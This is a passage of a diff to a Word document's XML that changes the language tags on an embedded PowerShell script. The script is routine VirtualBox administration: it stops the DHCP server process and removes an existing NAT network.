-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Stop DHCP server process if it's running</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dhcpProcess</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = Get-Process -Name </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxDHCP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ErrorAction</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -4374,43 +5832,394 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>SilentlyContinue</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>if ($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dhcpProcess</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Wait</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>terminate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Remove</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>existing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>needed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve"># Check </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (VBoxManage.exe </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> list | Select-String -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Pattern</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>) {</w:t>
       </w:r>
@@ -4420,216 +6229,122 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Write-Host "Stopping VirtualBox DHCP server..."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Stop-Process -Name </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxDHCP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -Force</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Start-Sleep -Seconds </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>2  #</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Wait for the process to terminate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Remove existing NAT network if needed</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
-        <w:t># Check if the NAT network exists</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">if (VBoxManage.exe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> list | Select-String -Pattern $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>If</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>remove</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -4637,33 +6352,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t># If it exists, remove it</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
         <w:t xml:space="preserve">VBoxManage.exe </w:t>
@@ -4673,7 +6362,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
       </w:r>
@@ -4682,16 +6371,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> remove --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>remove</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>netname</w:t>
       </w:r>
@@ -4700,7 +6407,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
       </w:r>
@@ -4709,7 +6416,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -4720,14 +6427,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -4735,17 +6442,35 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:tab/>
-        <w:t>Write-Output "NAT network '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+        <w:t xml:space="preserve">Write-Output "NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -4754,42 +6479,96 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' removed successfully."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>removed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>successfully</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
